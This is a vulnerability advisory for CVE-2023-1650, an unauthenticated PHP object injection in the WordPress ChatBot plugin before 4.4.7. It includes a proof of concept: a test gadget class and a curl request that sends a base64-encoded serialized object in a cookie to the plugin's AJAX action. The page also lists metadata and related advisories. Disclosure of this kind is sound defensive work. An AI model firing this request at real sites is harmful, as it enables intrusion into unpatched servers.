ChatBot < 4.4.7 – Unauthenticated PHP Object Injection | CVE 2023-1650 | Plugin Vulnerabilities

Description

The plugin unserializes user input from cookies via an AJAX action available to unauthenticated users, which could allow them to perform PHP Object Injection when a suitable gadget is present on the blog

Proof of Concept

To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Then, when a GPT engine is set as Open AI model in the settings (/wp-admin/admin.php?page=wpbot_openAi), make the below request to trigger the unserialisation:

curl -X 'POST' -b 'last_five_prompt=Tzo0OiJFdmlsIjowOnt9' 'https://example.com/wp-admin/admin-ajax.php?action=openai_response'

Tzo0OiJFdmlsIjowOnt9 being the base64 of O:4:"Evil":0:{}

Affects Plugins

Fixed in 4.4.7

References

CVE

Classification

Type

OBJECT INJECTION

OWASP top 10

A8: Insecure Deserialization

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

7d7fe498-0aa3-4fa7-b560-610b42b2abed

Timeline

Publicly Published

2023-04-12 (about 2 years ago)

Added

2023-04-12 (about 2 years ago)

Last Updated

2023-04-12 (about 2 years ago)

Other

Published

Title

Published

2025-05-20

Title

Goodlayers Hotel <= 3.1.4 - Unauthenticated PHP Object Injection

Published

2024-01-31

Title

ERE Recently Viewed < 2.0 - Unauthenticated PHP Object Injection

Published

2025-09-03

Title

Quiz And Survey Master < 10.2.6 - Unauthenticated PHP Object Injection

Published

2024-03-26

Title

Hercules Core < 6.5 - Authenticated (Subscriber+) PHP Object Injection

Published

2025-03-04

Title

VEDA - MultiPurpose WordPress Theme <= 4.2 - Authenticated (Subscriber+) PHP Object Injection